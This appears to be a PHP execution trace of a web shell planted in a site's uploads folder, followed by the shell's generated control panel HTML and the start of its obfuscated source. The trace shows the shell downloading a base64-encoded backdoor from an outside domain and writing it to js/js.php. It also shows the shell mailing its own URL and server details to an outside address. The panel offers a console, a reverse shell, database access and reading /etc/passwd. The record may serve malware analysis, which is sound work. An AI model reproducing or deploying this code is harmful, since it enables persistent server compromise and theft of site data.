5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 581 $info .= 'w'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 584 $info .= 'x'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 587 $info .= 'r'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 588 $info .= 'w'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 591 $info .= 'x'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 594 $info .= 'r'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 595 $info .= 'w'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 598 $info .= 'x'
5 119 1 0.402729 628496
5 119 R 'drwxrwxrwx'
5 121 0 0.402743 628456 substr 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 435 3 'drwxrwxrwx' 0 1
5 121 1 0.402758 628552
5 121 R 'd'
4 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 438 $formId = '.d'
4 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 443 $file = ''
4 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 451 $link = '<form id=".d" action="" method="get"> <input type="hidden" name="directory" value="/var/www/"> <a href="#" onclick="document.getElementById(\'.d\').submit();"> . </a></form>'
5 122 0 0.402811 628640 getFileSize 1 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 465 2 '/var/www/' ''
6 123 0 0.402826 628640 filesize 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 607 1 '/var/www/'
6 123 1 0.402841 628680
6 123 R 4096
5 122 1 0.402854 628640
5 122 R 4096
5 124 0 0.402867 628640 getFileLastModTime 1 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 466 2 '/var/www/' ''
6 125 0 0.402882 628640 filemtime 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 613 1 '/var/www/'
6 125 1 0.402896 628680
6 125 R 1676238152
6 126 0 0.402908 628640 date 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 613 2 'F d Y H:i:s.' 1676238152
6 126 1 0.402940 628968
6 126 R 'February 12 2023 16:42:32.'
5 124 1 0.402955 628896
5 124 R 'February 12 2023 16:42:32.'
5 127 0 0.402969 628640 filepermission 1 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 467 1 '/var/www/'
6 128 0 0.402983 628640 fileperms 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 550 1 '/var/www/'
6 128 1 0.402997 628680
6 128 R 16895
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 550 $perms = 16895
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 567 $info = 'd'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 580 $info .= 'r'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 581 $info .= 'w'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 584 $info .= 'x'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 587 $info .= 'r'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 588 $info .= 'w'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 591 $info .= 'x'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 594 $info .= 'r'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 595 $info .= 'w'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 598 $info .= 'x'
5 127 1 0.403123 628680
5 127 R 'drwxrwxrwx'
5 129 0 0.403138 628640 getFileOwner 1 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 468 2 '/var/www/' ''
6 130 0 0.403152 628640 fileowner 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 619 1 '/var/www/'
6 130 1 0.403170 628680
6 130 R 0
6 131 0 0.403182 628640 posix_getpwuid 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 619 1 0
6 131 1 0.403207 629440
6 131 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 619 $fileOwnerInfo = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
5 129 1 0.403256 628672
5 129 R 'root'
5 132 0 0.403270 628640 getFileGroup 1 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 469 2 '/var/www/' ''
6 133 0 0.403285 628640 filegroup 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 626 1 '/var/www/'
6 133 1 0.403299 628680
6 133 R 0
6 134 0 0.403311 628640 posix_getgrgid 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 626 1 0
6 134 1 0.403334 629296
6 134 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 626 $fileGroupInfo = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
5 132 1 0.403377 628672
5 132 R 'root'
5 135 0 0.403391 628640 readdir 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 427 1 resource(13) of type (stream)
5 135 1 0.403406 628680
5 135 R FALSE
4 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 427 $file = FALSE
5 136 0 0.403431 628640 closedir 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 474 1 resource(13) of type (stream)
5 136 1 0.403448 628456
5 136 R NULL
4 81 1 0.403461 628104
4 137 0 0.403468 628104 foothtml 1 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 819 0
4 137 1 0.403483 628104
4 138 0 0.403495 628104 fopen 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 827 2 'data.txt' 'r'
4 138 1 0.403525 628176
4 138 R FALSE
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 827 $datas = FALSE
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 828 $i = 0
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 829 $i++
4 139 0 0.403572 628104 fgets 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 830 2 FALSE 1024
4 139 1 0.403589 628168
4 139 R FALSE
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 830 $blue = FALSE
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 829 $i++
4 140 0 0.403622 628104 fgets 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 830 2 FALSE 1024
4 140 1 0.403637 628168
4 140 R FALSE
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 830 $blue = FALSE
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 829 $i++
4 141 0 0.403669 628104 fgets 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 830 2 FALSE 1024
4 141 1 0.403684 628168
4 141 R FALSE
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 830 $blue = FALSE
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 829 $i++
4 142 0 0.403715 628104 fgets 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 830 2 FALSE 1024
4 142 1 0.403730 628168
4 142 R FALSE
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 830 $blue = FALSE
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 829 $i++
4 143 0 0.403760 628104 fgets 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 830 2 FALSE 1024
4 143 1 0.403775 628168
4 143 R FALSE
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 830 $blue = FALSE
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 829 $i++
4 144 0 0.403805 628104 fgets 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 830 2 FALSE 1024
4 144 1 0.403820 628168
4 144 R FALSE
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 830 $blue = FALSE
4 145 0 0.403846 628104 fopen 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 832 2 'js/js.php' 'r'
4 145 1 0.403872 628176
4 145 R FALSE
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 832 $datasi = FALSE
4 146 0 0.403897 628104 mkdir 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 833 1 'js'
4 146 1 0.403937 628144
4 146 R TRUE
4 147 0 0.403951 628104 file_get_contents 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 834 1 'https://wordpres.page/txt/lamer.txt'
4 147 1 0.698624 679096
4 147 R '<?php eval(base64_decode(\'CiBnb3RvIFA0d0pNOyBBaTgxMDogJHgwelJ5ID0gJHVENjRfQ29tKCR1RDY0X0MwbSgkdUQ2NF9jMG0oIlwxMjVcMTE1XDE3MVx4NDFceDRhXHgzN1x4NWFceDJiXHg1Mlx4MzhcMTEwXDU3XHg0OFx4NGZceDcxXHg0MVx4NzlcMTIzXDE0M1x4NGNcMTAzXDEyNlx4NjZcMTEyXHg3NlwxMDNceDU2XHg0YVx4NmNceDUwXHg2OFx4NGZceDYxXDEwNlw2M1x4NmVceDQ0XHg2NFwxMzFcMTQ3XHg2Zlx4NzFceDUyXHg1MFwxNDFcNTdcNjZceDRkXDU3XHg3NVx4NzFcNjZcMTYyXDExMlwxNzJceDc5XHg0N1wxNzJceDZmXDE3Mlx4NjFceDQxXHgyYlx4NTdceDQ4XHg3NlwxNzBceDY2XHgzMVwxMzJceDMwXDYzXHg2OVx4NmZceDMxXDE1Mlx4NTNce'
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 834 $dos = '<?php eval(base64_decode(\'CiBnb3RvIFA0d0pNOyBBaTgxMDogJHgwelJ5ID0gJHVENjRfQ29tKCR1RDY0X0MwbSgkdUQ2NF9jMG0oIlwxMjVcMTE1XDE3MVx4NDFceDRhXHgzN1x4NWFceDJiXHg1Mlx4MzhcMTEwXDU3XHg0OFx4NGZceDcxXHg0MVx4NzlcMTIzXDE0M1x4NGNcMTAzXDEyNlx4NjZcMTEyXHg3NlwxMDNceDU2XHg0YVx4NmNceDUwXHg2OFx4NGZceDYxXDEwNlw2M1x4NmVceDQ0XHg2NFwxMzFcMTQ3XHg2Zlx4NzFceDUyXHg1MFwxNDFcNTdcNjZceDRkXDU3XHg3NVx4NzFcNjZcMTYyXDExMlwxNzJceDc5XHg0N1wxNzJceDZmXDE3Mlx4NjFceDQxXHgyYlx4NTdceDQ4XHg3NlwxNzBceDY2XHgzMVwxMzJceDMwXDYzXHg2OVx4NmZceDMxXDE1Mlx4NTNce'
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 835 $data = 'js/js.php'
4 148 0 0.698794 679056 touch 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 836 1 'js/js.php'
4 148 1 0.698842 679096
4 148 R TRUE
4 149 0 0.698858 679056 fopen 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 837 2 'js/js.php' 'w'
4 149 1 0.698894 679584
4 149 R resource(15) of type (stream)
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 837 $ver = resource(15) of type (stream)
4 150 0 0.698923 679512 fwrite 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 838 2 resource(15) of type (stream) '<?php eval(base64_decode(\'CiBnb3RvIFA0d0pNOyBBaTgxMDogJHgwelJ5ID0gJHVENjRfQ29tKCR1RDY0X0MwbSgkdUQ2NF9jMG0oIlwxMjVcMTE1XDE3MVx4NDFceDRhXHgzN1x4NWFceDJiXHg1Mlx4MzhcMTEwXDU3XHg0OFx4NGZceDcxXHg0MVx4NzlcMTIzXDE0M1x4NGNcMTAzXDEyNlx4NjZcMTEyXHg3NlwxMDNceDU2XHg0YVx4NmNceDUwXHg2OFx4NGZceDYxXDEwNlw2M1x4NmVceDQ0XHg2NFwxMzFcMTQ3XHg2Zlx4NzFceDUyXHg1MFwxNDFcNTdcNjZceDRkXDU3XHg3NVx4NzFcNjZcMTYyXDExMlwxNzJceDc5XHg0N1wxNzJceDZmXDE3Mlx4NjFceDQxXHgyYlx4NTdceDQ4XHg3NlwxNzBceDY2XHgzMVwxMzJceDMwXDYzXHg2OVx4NmZceDMxXDE1Mlx4NTNce'
4 150 1 0.699017 679576
4 150 R 47731
4 151 0 0.699032 679512 fclose 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 839 1 resource(15) of type (stream)
4 151 1 0.699085 679112
4 151 R TRUE
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 840 $yol = 'http://localhost/uploads/Vhosts.php'
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 841 $y = '<h1>Sender Yazdirildi.<br/> SITE YOL : http://localhost/uploads/Vhosts.php<br/>Sender Yolu : js/crs.php</h1>'
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 842 $header .= 'From: SheLL Boot <suppor@nic.org>\n'
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 843 $header .= 'Content-Type: text/html;\r\n charset=utf-8\n'
4 152 0 0.699205 679416 mail 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 845 4 'byhero44@gmail.com' 'Hacklink Bildiri' '<h1>Sender Yazdirildi.<br/> SITE YOL : http://localhost/uploads/Vhosts.php<br/>Sender Yolu : js/crs.php</h1>' 'From: SheLL Boot <suppor@nic.org>\nContent-Type: text/html;\r\n charset=utf-8\n'
4 152 1 0.699994 679560
4 152 R FALSE
4 153 0 0.700018 679416 mail 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 846 4 'byhero44@gmail.com' 'Hacklink Bildiri' '<h1>Sender Yazdirildi.<br/> SITE YOL : http://localhost/uploads/Vhosts.php<br/>Sender Yolu : js/crs.php</h1>' 'From: SheLL Boot <suppor@nic.org>\nContent-Type: text/html;\r\n charset=utf-8\n'
4 153 1 0.700745 679560
4 153 R FALSE
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 849 $kime = 'byhero44@gmail.com'
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 850 $baslik = 'keisatsu shell 20203'
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 851 $EL_MuHaMMeD = 'Dosya Yolu : /var/www/html\r\n'
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 852 $EL_MuHaMMeD .= 'Server Admin : webmaster@localhost\r\n'
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 853 $EL_MuHaMMeD .= 'Server isletim sistemi : Apache/2.4.52 (Ubuntu)\r\n'
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 854 $EL_MuHaMMeD .= 'Shell Link : http://localhost/uploads/Vhosts.php\r\n'
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 855 $EL_MuHaMMeD .= 'Avlanan Site : localhost\r\n'
4 154 0 0.700873 679416 mail 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 856 3 'byhero44@gmail.com' 'keisatsu shell 20203' 'Dosya Yolu : /var/www/html\r\nServer Admin : webmaster@localhost\r\nServer isletim sistemi : Apache/2.4.52 (Ubuntu)\r\nShell Link : http://localhost/uploads/Vhosts.php\r\nAvlanan Site : localhost\r\n'
4 154 1 0.701769 679512
4 154 R FALSE
3 19 1 0.701795 679416
2 7 1 0.701811 624720
1 3 1 0.701818 621424
0.701855 538568
TRACE END [2023-02-12 19:42:59.523849]
Generated HTML code
<html><head><style>body {background-color:#1A1A1D;color:white; font-size:20px;}input[type=text], select {width: 60%;padding: 12px 20px;font-size:20px;border-color:#470B0B; background-color:#C3BFB5}input[type=submit] {width: 10%;padding: 12px 20px;background-color:#470B0B;color:#C3BFB5;font-size:20px;border-color:#470B0B;}table{width:100%;}td,th {border: 1px solid transparent; padding:10px;}td {text-align:center;}tr:nth-child(even) td { background: #470B0B; } a {color:white;}#container {width:85%;float:right;padding-bottom:150px;}ul {list-style-type: none;margin: 0;padding: 0;overflow: hidden;}li {float: left;}li a {display: block;color: white;text-align: center;padding: 14px 16px;text-decoration: none;}li a:hover {background-color: #282828;}.active:hover {background-color: #470B0B;}.active {background-color: #470B0B;}td a{color:#97caf9;}th {color:#FFC04C;}#command {background-color:#C3BFB5;color:black;width:60%;padding-top:30px;padding-bottom:30px;padding-left:10px;}#fleftReverseShell {float:right;padding-right:5%;}footer {clear:both;background-color:black;font-size:11px;padding-left:5px;position:fixed;bottom:0;width:100%;height:150px;}#center {text-align:center;}</style></head><body><ul><li><a class="active" href="?">Home</a></li><li><a href="?console=1">Console</a></li><li><a href="?reverse-shell=1">Reverse Shell</a></li><li><a href="?database=1">Databases</a></li></ul><br><br><div id="container"><form action=""><label>Switch Directory:</label><br><input type="text" name="directory" placeholder="/var/www/html/"><input type="submit" value="Submit"></form><br><form action=""><label>Read File:</label><br><input type="text" name="displayfile" placeholder="/etc/passwd"><input type="submit" value="Submit"></form><table><tbody><tr><th>Name</th><th>Size</th><th>Last Modified Time </th><th>Permissions</th><th>Owner</th><th>Group</th></tr><tr><td><form id="..d" action="" method="get"> <input type="hidden" name="directory" value="/var/www/../"> <a href="#" onclick="document.getElementById('..d').submit();"> .. </a></form></td><td>4096</td><td>January 21 2023 14:37:39.</td><td>drwxr-xr-x</td><td>root</td><td>root</td></tr><tr><td><form id="htmld" action="" method="get"> <input type="hidden" name="directory" value="/var/www/html/"> <a href="#" onclick="document.getElementById('htmld').submit();"> html </a></form></td><td>4096</td><td>February 12 2023 16:42:26.</td><td>drwxrwxrwx</td><td>root</td><td>root</td></tr><tr><td><form id=".d" action="" method="get"> <input type="hidden" name="directory" value="/var/www/"> <a href="#" onclick="document.getElementById('.d').submit();"> . </a></form></td><td>4096</td><td>February 12 2023 16:42:25.</td><td>drwxrwxrwx</td><td>root</td><td>root</td></tr></tbody></table></div><footer><br><p id="center">By: <font color="red">MuricaSpi</font> AKA <font color="blue">Ghostlulz</font></p><p id="center"><a href="?">Home</a> <a href="?console=1">Console</a> <a href="?reverse-shell=1">Reverse Shell</a> <a href="#Databases">Databases</a></p><br><p>*NOT FOR ILLEGAL USE*</p><p>I am not resposible for what you do with this product.</p></footer></body></html>Original PHP code
<?php
$stt1 = "Sy1LzNFQsrdT0isuKYovyi8xNNZIr8rMS8tJLEkFskrzkvNz\x434pSi4upI5yUWJxqZhKfkpq\x63n5Kq\x41\x62SzKLVMQ6W4pMR\x41EwlY\x41w\x41\x3d";
$stt0 = "\x3dkDqVITih22\x427qpHJhqkQfP\x41/P\x2bP39F/n9\x2b/z\x62k5Ny6Ko\x63XP1Dd8eLztZwfOeLwhfeFTXXyq\x2bZL2E\x61uqhgvkOSu/nlWjiVgdXN\x61XdUf2\x62p/06lR2\x41K0uf0\x41E\x41tDoT75FDS3\x2bUDJxO2n\x63wvJirPjlYw5M7s\x63FNE\x6133O9\x61EvT\x42FTut4vVxjlq2DdkxX96L7oTM\x414m3V6uI1\x42NQyKO\x2bQR\x416rRGD\x629\x63g7l6\x2bJ4/89GW0nO22\x61\x41RUEie\x63RVXTHfqVz\x6244h\x43NST857e/w6S/Xe/dy\x2b\x42UWo\x63mseR15h1RjnnXYr6//MuI\x42gDlH/\x61DUjIXES\x42kv\x61pdl\x43\x61f\x63X8j9kUDLJ\x610F\x41Xe8h81F9U\x41LMsswQEJfm001Gxf7NyL\x63YYM\x42/pgIM\x62qJx8\x61vp3\x43jQ6uM\x41QhQI4h\x42T93VPZTl3DX\x62\x61FzpnQ9G\x6135QM\x63\x41L8WjpZoPyuEGyeorJ694E0OKI\x41dgT\x43V\x61lK\x61RM\x43rKy5xtD6Fr3\x62xO2RIy\x62XdUvX6uG5KYLmJS\x63NeenmNNSw49\x62w\x42VMtj1q7o1tifJnVuPHtWeR\x62Ns\x41PWRf7hzyGPpnq9nXz68Q/7VH7\x63\x41gLLmLvpm3\x423o3Vgv6tmE\x61hV5Nrq1\x2b4IO\x62WmhHVj\x63oydQXMtiD5NpexUdj5\x2buSK8EF6\x63OKe5V26dmn\x61G0\x417XSszr3z\x420W5yy02ERd\x42pzW3PsIZdktyi\x2bk\x62ndGOgw03kflReuk5\x41H2TPkh3/gQf\x2bRt\x63kF1Nk\x42QHxrIjE7SMS1Wz2Nd\x43ZmPkqZ1klwWIdmiqwyQjsy9ZLSit//\x43Q\x43Fw\x624G\x42WoGyg7RpPU1fYz\x41m5DToOHvsTOmtdIKuiult2uNUuDYzn1EZ\x61hFXhGJDJPJ\x43dKPfGFXlS/L\x43DRypVGjHk33\x43QzQ\x634EZ\x2bV/8vPlZo6j\x61rvEE\x62fRZJqqd6R1kWy5F\x425pEGJ\x62Y\x62Y1Fq\x41pWnLgTO9KvEp68lT\x42eM0Tg1S53wYYiGNSSWk\x62GFLwEjvIps\x61LSHmW\x42Xjqh8lI\x42kSeY\x63H\x63u3\x62zvQyQ\x61Kvtp0MW\x62F5JPxX\x62rV0Yh6vR\x63peGUQJE4hrU\x2b9kQJ2S\x43YQJz2Lk8omISER7lUlyLU6heEWeZMdskkkiLz/py1k\x61k8m3I\x43WpdISPHWMJoR\x2bv0E25\x2b\x61kE\x43NdmQ8IZs6m\x418KZ\x618xejhrDfEseVn6o\x41gVL\x42Z8xZsHHXjdwMeDnJg\x2buGEtni6uyVFo2hzvxyWq\x43\x61gwrFrFWojjVWX5i/K\x42F5\x41FljRQL2g\x61xTXrJRqH8Xs\x63PI\x61\x43HO/O\x61pfrE6TV2\x434v50Tg\x41\x61oHY0\x6395\x63\x2bh04l7wps2QSzq/T\x436rPTG\x61Hz9riMz\x2bZ/S9\x41FW\x422Xp5lz2iJxj\x41f9q5D7Mo\x61THN\x635lN9\x41SRVnt\x62Lqe/mK\x63LtVtt\x61NryFoS\x63YQuqyN0\x43jR56WD\x42F\x61jQ\x2bp\x42tek2\x62od\x41\x61qmPU9qe\x63\x624utlF\x63y93vvG0lofvXXT\x2b1p3z34oD\x632xvifSsNo5o7\x62LXzutF\x43sYH2hzd1VwmSSMGDk\x63hY5x2m\x63jqU/1iVPN/QGlyM6fzZl3sQSnp02d0Wo3kE037\x42\x2bVrX01Gk1rryvPv40MRp9xkoEST3xr98D\x62XxhzKxuHqKTZhOdGynl7\x41dsh\x618FwjM\x63Rrv8hrrMTY\x411PQF\x41MGuE1fVdo5o\x63\x61YuUEyy5HwYil\x2bgw\x41EHUgy8T6MrnMDUdhyYzFdQf08V\x63zhKr6GLNqU5knHQng\x2bHkIhfIWwMR\x63dpJsD\x41d5E0\x42e/k\x43pjV5GUPjj6G\x43xo\x63ee\x2bJuJoHWedoHWK\x42qL1U/85wl3LmHs4Fn\x43t\x42En3dU8mHKNi3kZ2ETYEMQZysj\x63h\x41\x63zfJXxtt7yhy1fWsdlHNH\x62NIoi3qVqsQIhFf\x611L\x63\x63sho0FJi\x63JJ\x43Jgs\x2bPu\x41/U2fLu8\x614pKDIWUdLsUg6yhQzFwtU8nLKthe52pK\x43ieX2dsrMQhk5kyRS1nZXZfVvDqY2X8iqDh\x62os/GVo\x43W2uniwk0\x43INs3KYdgXUoepiNz\x63nMVRVI4Pwp\x42G\x2bvf\x2bHLF2\x63R7iLS9\x2byk\x62L2kzT4R/JdmZ\x62YtIUtHN\x63\x2bo2qW3RuP0/JPHM9tEP8oSgfo/ik\x62LLIUsdZXJ9vVRRRg6SQ9Hm\x42Wn\x41RwyT\x42\x61FvyN\x41JsIK7r08TdZ\x42GK89P\x41f\x61eK3pOP\x423\x631f\x411EMVRgukUpR7ExoHjyhMQOgG\x43zkx\x42\x42gUGEVQsnIFyKTohIt\x62id0EMlwKTDiu92tuw\x43zO\x41269YJWPUrm0\x2bVHwiF5p3pXKrjUWe\x42q\x4392lM1\x614K7\x413h\x62\x2b3rEYUu\x43EgQF6J4\x61Nwz07ouiXHqZd4UL8qwm\x4225O5M\x63twwVWPQsiQH\x410ezp\x4267dHrX4Wmjl4n6\x63n\x61UxwniNT\x43\x41oENyYNrYztQN1Yz\x61V1g\x43VRp3rIsvQiXL9\x41gs\x62INg6\x61t\x2bE\x43rXtxD3HsWuXhoYlVvLVu\x41tQ7JO4hI\x42\x6239JKiy6\x439\x2b2jSKYm\x41U\x62P9EDK\x43fT\x63k2rU90G\x2bSEHz3DFEDqX1\x42\x2bV5oFiQLF9FjJ\x42jopOV\x61g5G2TsqykqU54/4qhMgIIxVle\x63xQuQl972sfnKrR\x2b5p\x2b/4S\x61Ni5M55quG3ix8XgglUUiwleeSmFeSZyM3oQ\x62E\x43PnUs0iwKefOz\x41XikUhy5\x61NsfoQOqT89s\x63eSY5Y7\x42YoG9Uqo4fTyD\x41MfF9\x63QUJt0M5Hs/SOXpm\x63Z8XYhW\x2bhUkhm6e\x61sIfI/\x41\x63dr\x43\x62vzE2Lgy4xEg\x43\x42K7Ls\x42LWyXJjuziyXkssZ7KRK0quLdKtgmqFsFLSIE/JMOskYfRhIXSF\x43xe6tKq/ekquK7t5mSDXTle\x61j\x2bpN2sr\x43yn2l\x63ggJu8R1D9H30FZ5rr6Pe\x62zuqoe\x61j\x2bpNKKS\x2b\x42SqdJ\x41/UHRKoX/q\x62VmV09G\x42Ltrk3yZe/koiOTUTkX\x43\x61yXw\x62\x62Gpy\x42\x638ldpnY\x62vhDDYfV0JI\x62XIVO3\x63wY\x63UyHkgLsdd3\x41Y\x63fPhFp\x41\x62f\x61Kd\x61uhkdUkHWvP\x43Q6Q2LlUJ32wuM98TnMF2iUFTSHk83\x42Ywi5\x2bZWjIGSdgYp\x43Q/Gl\x62\x63p4myV\x41e\x63TJq9ngPtNXNkhOhS9nQF\x63WIpkXtTGpV3DiVL\x43pLtllL5WQsj7Gdkw\x426nfy7Xp2i4\x63VSrkgo\x42ftXUSx9dk\x63r\x62\x63voYDwR3sZUY\x61iH30Q4myW20\x61\x2b8Y9KuRWFS44\x61\x42pTSGPXKsfv\x43qH1ltns539\x63/4DHj\x6110Je\x63O8h30T6vOmH1hQfIrRkXDK2dLV7kMtIokIMzI2f5TxU20\x61yyFEtsD\x43nJ\x6282JTPz0l2tdgQhiL2mOxflZ79gL27DvDXNppjJK\x2bJJOwFM31SQm\x4372Kykj6\x63x\x63t\x41\x43zo2mhXf83KUkDQhKR4xE8QhlF5UwgusLmtDXXFHINU2Q1DurYudD\x62\x42TFEJP8omJgOj3J4stt\x61gQfwf55\x41S\x42x8kovU5ld\x43HI1YF\x61Yegj9HdHV5YfV15VniMU85TFDWqz21X2Qy4Xxed4fWT2uzkLj/hZ/xf\x61qvYZxOjMgvemwy8MW4sLM\x62Piy\x2bgnI\x62r4gXi2\x42vey7dL7tFHmg5nwXsGnn8\x417zkysMQf12mL\x43SpZnjgqTvJQkJZvQI66i0KUTxUmep\x61HENxkD\x42FWFy1ISySuyt97q0EKV\x42wEtw4f7QZQuoG60\x42kdF7z2JlgdXrf\x41EoZ57WKp1Wq/leDSuNGq3exvf/WL\x62fXsivw7\x61U6sd\x2b5oO8VjI\x41i\x43nVULWqP9PhpV90RG\x42Dywyt4l\x2bk0uGfKxxQ/6IV2VE79tM4\x62yhL\x42ErhQP\x41T3K\x61PDNZXD\x62M7Hr\x43XjF\x41\x41SlTQsoQjFHtmOdU\x41NKrtQ3qhlnSDJzR6\x614zWj\x6183piLy\x61OSzr0\x62deYOqI9Hg019T\x43/Nqq5\x63KiGWDNfRWUDEeUsEl\x61eoYi3oysWQH5Z7RZ56pJ0RzdFt\x42pg2mqW\x42Ex141ooHpnjWeQnf7h61W\x638Mxh\x41oGr88Jou7EFJx8s\x61\x63JtM/opI\x43hhM\x421FDM\x43I5JZR5ZmYDz9Z\x41S\x42u5sYGVXqrGSi0\x62Yqj\x42XIjZl\x4199K\x61REWd4l/nFTW50VRUKQ\x42uEli\x2bH\x41I\x62YNE2JGI\x62SSjIeVfdQ8\x626uKtZ\x43PJHd7NYm\x2bqqsMyfD\x61fQk0n\x423\x638nwq\x42iYU9\x63Uy\x42QGpTQ12\x41EG\x6